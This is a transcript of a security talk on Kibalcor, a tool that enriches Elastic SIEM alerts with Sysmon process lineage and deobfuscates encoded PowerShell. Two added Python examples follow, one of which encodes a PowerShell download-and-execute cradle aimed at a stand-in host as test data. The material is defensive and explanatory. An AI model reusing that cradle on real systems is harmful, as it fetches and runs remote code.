
Thank you. Hello everyone, and welcome to my talk on transforming noise into insight through automation. A little bit about me: my name is Ano, I currently work as a security consultant at the University of Le, I'm also a researcher, and I am passionate about automated investigations. Some of what I'm going to discuss today includes features usually found on expensive EDR dashboards, but I'll talk about how to replicate them using free or open source tools, especially for those with a limited security budget.

So what are we aiming to achieve here? In a traditional SIEM setup, your endpoint and network devices send their logs to your SIEM, where the detection engine evaluates those logs and generates alerts as needed. At this point an analyst has to review those alerts, correlate the data and perform investigations. What we're going to do is introduce a tool that will automatically pick up those alerts, extract relevant information, run correlated searches, summarize the findings into a report and store that report in a different index.

So I've been working on a tool called Kibalcor. When I started working on it I was a one-person army doing the job of five, and I wanted to automate some of the correlation tasks during investigations. I also wanted to automatically detect and deobfuscate obfuscated PowerShell, and ultimately I wanted to streamline the process of adding context to an alert, to speed up the identification and scoping process. For this I used an Elastic SIEM with a basic license. I leverage Windows native event logs as well as Sysmon logs.

A quick reminder on Sysmon: it's an agent that you can install on your endpoints that will record several actions performed by a process on that system. When a new process is created, Sysmon automatically generates a globally unique identifier and assigns it to that process. It also records information about the user that started that process, as well as the parent process if there is one. Subsequently, when that process performs other actions on your system, Sysmon will record the relevant event, and to tie those events back to the original process create event, Sysmon will copy that process GUID to the subsequent event. Currently, from an event perspective, Sysmon can create events when a process performs any of the actions listed here. Here are the event IDs; the ones highlighted in red are the ones that do not have a process GUID, because they're not tied to a specific process.

So let's say an alert is triggered by a DNS event, for example, I don't know, maybe someone accessed a domain that was registered less than two months ago. By using the process GUID on the event as our reference point, we can find out all the actions taken by that process on the system. Next, if we find out the GUID of the parent and use that as our new reference point, we can find out all the actions taken by the parent on the system. By using the same logic we can find out what the parent of the parent was, which I call ancestor one to start with, because otherwise the lineage becomes very complicated. So I just call it ancestor one, and as we go up the chain I just increment the number. If you come back to the original process, we can find out all the GUIDs of its children, and if we use those as the reference for correlation we can do the same thing going down. So now, when we are alerted on an action taken by a process on the system, we can automatically put some context around it and establish where it came from and where it went.

If we can find out the user name and the logon ID, we can query the Windows event logs to find out other actions taken by that user at this time on that system. Think: how did they get onto that system? Was it a hands-on-keyboard logon, was it a network logon, was it RDP, what was the source IP, and so on. There are many techniques that can be used to elevate your privileges on a Windows system, and some are stealthier than others, so depending on what technique was used to obtain admin access there might be an event log that was logged to reflect that: things like special privileges assigned to a new logon, the existence of a linked logon ID, and so on. We can also pull up all notable actions, I mean security-related actions, taken by that user on that system: things like user and group management, scheduled task management, service management, event log cleared, and so on.

We can also add HR information. Now, for this it requires either you synchronizing some of your HR information into an index in your SIEM, or, if your HR system offers an API that can be leveraged, the tool can do that. Some of the information that we can add here includes the user status (are they still employed with us?) and their department or unit. In this case, let's say you see somebody running PowerShell: if this is an admin, maybe that's okay, but if they're from marketing, that's probably something you need to take seriously right away. We can add their contacts, their location, their manager, so that if you need to reach out to someone that information is right there.

Quite often during an investigation you come across things like this: Base64 encoding in the process command line. Attackers and red teamers will do this to hide what they are doing, and what you typically have to do at this point is identify and extract the Base64 yourself, then move away from your SIEM into a different tool to try and decode it. Plus, they will use multiple layers of obfuscation to make your job as an investigator more difficult and challenging, and it typically looks like this: they take a payload, do something to it, do something else to it, and then do something else to it, and they will throw all kinds of things in: Unicode, binary, XOR, compression, encryption; there are so many possibilities. To reverse it you have to do the exact same thing, but in reverse. So typically the easiest thing to do is decode the Base64, but you often end up with some more garbage; now you have to work out what that garbage is so that you can reverse it. Again, there are tools out there that will allow you to do this, but they require you taking the information out of your SIEM into one tool, and sometimes you have to move to another tool depending on what you're dealing with.

So what Kibalcor would do in this case is, whenever it detects Base64 in the process command line, it automatically extracts it, decodes the Base64, tries to determine the next step, that is, the data type that it got after the Base64 decode, reverses it, and keeps doing it until it gets to something it can no longer deal with. As it goes through that process, every time it detects a data type and reverses it, it records what it did, just to give you that full context directly within your SIEM. So you can understand: sometimes, when you have to make the call as in "is this benign, is it not?", based on all the different types of encoding and obfuscation steps taken, it can allow you to make that call quickly.

Quite often when deobfuscating obfuscated PowerShell you end up with plain ASCII, but you still can't understand what they're trying to do, because they will use aliases, short-handed versions of commands, string-based manipulation techniques, and in this case we can use the PowerShell abstract syntax tree to revert some of that stuff.

So Kibalcor is written in Python and PowerShell and can run as a Linux service, a cron job, or ad hoc. When events are sent into Elastic, Kibana creates an alert; Kibalcor will automatically pick up those alerts, perform correlation and store the report. The detection engine in Elastic is called Kibana, and the tool name is short for Kibana alert correlator.

So we're going to move into the demo. To demo the features of the tool I used publicly available malware data from the Splunk Attack Range project, so kudos to them. In the demo setup I have a deployment of Elastic, a deployment of Kibalcor, and I also use TheHive Community Edition to facilitate the navigation between the data sets. So, to avoid issues related to live demos, I pre-recorded a video of a typical Kibalcor report, which I'm going to play now. Bear with me.
Now, there's a lot going on in the video, but I added some arrows to help you keep track of what's going on and what I'm talking about.

So here we have an alert that was triggered because someone ran a command that says "show me all domain user accounts". Now, is this a sysadmin? Is this common in your environment? Maybe you've seen this before and it was fine; how do you know this time it's not? The severity here says low, so if you're receiving more alerts than you have time to investigate, this is probably something you wouldn't prioritize at this time, because you would be working on your higher severity alerts. So let's check out the correlated report that was generated to see what additional context was added for this alert.

The report is easier to read in JSON format, so let's switch to the JSON view. The first section contains information about the environment and the rule that was triggered, so let's skip it and fast forward to the interesting part. Here we are looking at the process lineage that was generated. It starts with ancestor number eight, which was explorer.exe, so we know the user probably had graphical access to the system. explorer.exe had 20 children and we have summary information about them, including their unique identifiers; these children include cmd.exe, PowerShell, 7zip and so on. Explorer was observed making network connections, creating files, setting registry values, creating and connecting to named pipes and deleting files. The network connections were directed to a public IP address that starts with 51 and ends with 159, and socket information shows that these connections were made on port 443. We also have the list of LNK files created by Explorer, indicating the files or directories that the user may have accessed.

Next in the lineage is ancestor number seven, which is cmd.exe, or Windows Command Processor, and if we pay attention to the process command line we see that the user started cmd and changed directory to the Downloads folder. cmd had one child process, rundll32; therefore the next ancestor, number six, is rundll32, which is a process that enables Windows to execute functions stored in DLL files. Here the command line reveals that rundll32 was invoked to run the function StartW within the DLL file named 1.dll. Given that we previously changed directory to the Downloads folder, we can infer that this DLL file is located there, so during the next phase of our investigation we should attempt to obtain a sample of this DLL file, provided that it hasn't been deleted yet. rundll32 had one child process, also rundll32, but this instance was located in the SysWOW64 folder, which on 64-bit systems is the 32-bit version of rundll32. This indicates that the DLL named 1.dll is a 32-bit DLL.

So next, ancestor 5 is the 32-bit rundll32 with the same command line arguments as before; it has one child, wermgr.exe. Next, ancestor 4 is wermgr, which is the Windows Error Reporting process. It had eight children, seven of them being instances of cmd.exe and one of them being a process located in the user's temp folder. This Windows Error Reporting process was observed performing network connections, accessing other processes, creating files and performing DNS queries. The network connections were directed to four public IP addresses, and socket information reveals connections to the IP starting with 95 were made on port 80, to the IP starting with 67 on port 443, to the IP starting with 98 on port 447, and to the IP starting with 104 on port 443. It accessed the lsass process and created two files, one of them in the temp directory and another one in a subdirectory of the Roaming directory; these were potentially downloaded through the above network connections. We have all the DNS queries performed here; some yielded responses while others did not. We previously observed network connections to a public IP starting with 104, and now we know which DNS query will resolve to that IP. Similarly, for the connection to the IP address starting with 95, we have identified the corresponding DNS query.

Next, ancestor number three was an instance of cmd.exe, and here is what its command line arguments looked like: it called PowerShell and passed what looks like a Base64-encoded string. This cmd process had one child, PowerShell. Because Base64 was detected in the command line, it was automatically extracted; it then went through the deobfuscation process, and here is what the result looks like. Even if we're not PowerShell experts, we can still look for keywords that will give us an indication of what the code is trying to do. For instance, the function IO.MemoryStream is commonly used to download and execute code directly in memory without writing to the file system, a technique often employed by fileless malware. Additionally, the presence of a byte array, typically used to store and execute malicious payloads in binary format directly from memory, is another indicator of potentially malicious activity. Here are the steps that were recorded during the deobfuscation process: we decoded the Base64 data, revealing some bytes; these bytes were further decoded, during which Unicode null bytes were identified and cleaned up; we then analyzed it using the PowerShell abstract syntax tree. This process outlines how the code was obfuscated; if you need to decode it again, just follow these steps.

Now we go down to ancestor number two, which was PowerShell, and we see all the command line arguments passed from cmd.exe, with the same Base64-encoded string as before. This PowerShell process had eight children, including rundll32, cmd and PowerShell itself. It was seen performing network connections, creating files, creating and connecting to named pipes, performing DNS queries and deleting files. Because Base64 was passed to cmd, which then passed it to PowerShell, it means it was detected and deobfuscated each time, so this deobfuscation block is similar to the previous one; let's skip it. The network connections were directed to a public IP address starting with 23 and ending with 84; socket information shows these connections were made on port 80. We have the named pipe that was created by this process and the ones that were accessed; their names start with the prefix postex. Named pipes with the prefix postex are typically associated with post-exploitation activities in malware or attack frameworks.

Next, ancestor one was another instance of cmd.exe; we see the command line arguments were net users /domain. It had one child, the net command, so naturally that's going to be our parent in the process lineage, and the command line arguments are the ones passed from cmd. It had one child, the net1 command; if we look at the command line arguments we see that this is what triggered our alert. So now, based on the additional information provided by the report, we not only know that something malicious is going on, but we've also gathered numerous indicators of compromise, such as domain names, IP addresses and file locations, and these would be crucial for the next phase of our investigation, which is scoping.
So we've demonstrated how we can take an alert that most analysts can ignore if they are, you know, overwhelmed with hundreds of alerts to deal with, and we've shown how, with the context added by the tool, to assess this it's basically how long it will take you to read a report to determine that something malicious is going on. Also, it's done a lot of the pre-correlation and investigation for you, so you now have IOCs that you can start using to either block stuff on your firewall, or scope and see what other systems may have been affected, and things like that. And that's why the tool is so valuable.
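The process-lineage walk described earlier (parent, then ancestor 1, 2, ... upward, children downward, with each process's observed Sysmon actions), as an added Python example that is not Kibalcor's own code. It assumes flattened Sysmon fields (EventID, ProcessGuid, ParentProcessGuid, Image, CommandLine); the events and GUIDs are constructed placeholders, and a real deployment would fetch these records from the SIEM index instead.

```python
from collections import defaultdict
# Sysmon event IDs that carry a ProcessGuid, mapped to a readable action name;
# events with no ProcessGuid (e.g. IDs 4, 6, 16) are skipped by index_events().
ACTIONS = {3: "network connection", 10: "process accessed", 11: "file created",
           13: "registry value set", 17: "pipe created", 22: "DNS query", 23: "file deleted"}
# Constructed sample events in a flattened form; the GUIDs are placeholders.
EVENTS = [
    {"EventID": 1, "ProcessGuid": "G-EXPL", "ParentProcessGuid": None,
     "Image": "explorer.exe", "CommandLine": "explorer.exe"},
    {"EventID": 1, "ProcessGuid": "G-CMD", "ParentProcessGuid": "G-EXPL",
     "Image": "cmd.exe", "CommandLine": "cmd.exe /c cd Downloads"},
    {"EventID": 1, "ProcessGuid": "G-PS", "ParentProcessGuid": "G-CMD",
     "Image": "powershell.exe", "CommandLine": "powershell.exe -enc <constructed>"},
    {"EventID": 1, "ProcessGuid": "G-NET", "ParentProcessGuid": "G-PS",
     "Image": "net.exe", "CommandLine": "net users /domain"},
    {"EventID": 22, "ProcessGuid": "G-PS", "QueryName": "c2.example.test"},
    {"EventID": 3, "ProcessGuid": "G-PS", "DestinationIp": "203.0.113.5"},
    {"EventID": 13, "ProcessGuid": "G-EXPL", "TargetObject": "HKCU\\...\\Run\\x"},
    {"EventID": 16, "Configuration": "sysmon.xml"},  # no GUID: not process-bound
]

def index_events(events):
    """Return (creates, by_guid): the EID 1 record per GUID, and all events per GUID."""
    creates, by_guid = {}, defaultdict(list)
    for ev in events:
        guid = ev.get("ProcessGuid")
        if guid is None:
            continue
        by_guid[guid].append(ev)
        if ev["EventID"] == 1:
            creates[guid] = ev
    return creates, by_guid

def build_lineage(events, alert_guid):
    """Walk ParentProcessGuid upward (parent, then ancestor 1 = grandparent, 2, ...)."""
    creates, by_guid = index_events(events)
    children = defaultdict(list)
    for guid, ev in creates.items():
        children[ev["ParentProcessGuid"]].append(guid)

    def node(guid):
        create = creates.get(guid, {})
        acts = {ACTIONS.get(e["EventID"], f"event {e['EventID']}")
                for e in by_guid[guid] if e["EventID"] != 1}
        return {"guid": guid, "image": create.get("Image"), "actions": sorted(acts),
                "command_line": create.get("CommandLine"), "children": children.get(guid, [])}

    chain, seen = [], {alert_guid}
    cur = creates.get(alert_guid, {}).get("ParentProcessGuid")
    while cur and cur not in seen:  # the seen-set guards against GUID reuse loops
        seen.add(cur)
        chain.append(node(cur))
        cur = creates.get(cur, {}).get("ParentProcessGuid")
    return {"process": node(alert_guid), "parent": chain[0] if chain else None,
            "ancestors": chain[1:]}
```

Running `build_lineage(EVENTS, "G-NET")` yields net.exe, its parent powershell.exe (with its DNS and network actions), ancestor 1 cmd.exe and ancestor 2 explorer.exe, which is the structure the demo report walks through.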
Questions.

Q: Can we get it?

A: I'm still working on some features and ideas, and I'll publish it at some point; just watch out for it.

Q: Does it have any protection? What if the virus itself disables Sysmon?

A: As of version 15 it now runs as a protected process, the same as your EDR product. So prior to version 15, yeah, it was fairly easy to disable Sysmon on your system, but it now runs as a protected process as of version 15.

Q: Does it give you a hash at every step of the attempted deobfuscation of the PowerShell?

A: What do you mean by hash? Yeah, I mean the SHA and MD5 are taken from the signature of the process, and in this case everything within that chain was built-in Windows processes; that's why I didn't emphasize the hashes, because those are built-in Windows processes to begin with. But when you are dealing with processes that they brought in, or that they compiled on the fly and things like that, that's where it will tell you the hashes, and that's when it can also be used for scoping. Yeah, question; one more question.

Q: Can we use Splunk instead?

A: No. Now, it will work with most SIEMs that have a JSON back end. The issue with Splunk is that Splunk stores different data sets in different formats, and having to accommodate all those formats is pretty complicated. It was much easier with Elastic, because everything is JSON, so I know exactly the format of what I'm going to get, so it's easier to parse and create a report. So that's the only challenge with Splunk; I tried Splunk, but it was just very challenging.

Moderator: If you've got any more questions, find him outside; I'm sure he can talk for a long time about this. It's an amazing product. It is cool, yeah, feel free to ask him.
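The layered deobfuscation loop the talk describes (decode the Base64, work out what data type came out, reverse that, repeat, and record every step), as an added Python example that is not Kibalcor's own code. The obfuscated command line is constructed inline by applying the layers forward (payload, gzip, Base64 inside a hypothetical PowerShell stub, UTF-16LE, Base64) so the peeler can be checked against a known answer; the URL and stub are placeholders, and the PowerShell AST pass the tool applies afterwards is omitted here.

```python
import base64
import gzip
import re

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # a long Base64-looking run
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/x')"

def build_sample():
    """Constructed command line: payload -> gzip -> Base64 inside a PowerShell
    stub -> UTF-16LE -> Base64, the way layered obfuscation is built forward."""
    inner = base64.b64encode(gzip.compress(PAYLOAD.encode())).decode()
    stub = f"$d=[Convert]::FromBase64String('{inner}');IEX $d"  # hypothetical stub
    outer = base64.b64encode(stub.encode("utf-16-le")).decode()
    return f"powershell.exe -NoP -W Hidden -enc {outer}"

def classify(data: bytes) -> str:
    """Guess what the current layer is so the matching reversal can be applied."""
    if data[:2] == b"\x1f\x8b":
        return "gzip"
    if len(data) > 3 and data[1::2].count(0) > len(data) // 4:
        return "utf-16le"  # UTF-16LE text shows up as null bytes in odd positions
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return "binary"
    return "base64-bearing text" if B64_RE.search(text) else "plain text"

def peel(command_line: str, max_layers: int = 10):
    """Reverse one layer per iteration, recording each step, until nothing
    recognisable is left. Returns (final_text, steps)."""
    data, steps = command_line.encode(), []
    for _ in range(max_layers):
        kind = classify(data)
        if kind == "gzip":
            data = gzip.decompress(data)
            steps.append("gunzip")
        elif kind == "utf-16le":
            data = data.decode("utf-16-le", errors="replace").encode()
            steps.append("utf-16le decode (null bytes dropped)")
        elif kind == "base64-bearing text":
            blob = B64_RE.search(data.decode("ascii")).group(0)
            data = base64.b64decode(blob + "=" * (-len(blob) % 4))
            steps.append("base64 decode")
        else:
            break  # plain text or undecodable binary: the loop stops here
    return data.decode(errors="replace"), steps

if __name__ == "__main__":
    text, steps = peel(build_sample())
    print(text)
    print(" -> ".join(steps))  # the recorded trail an analyst can replay by hand
```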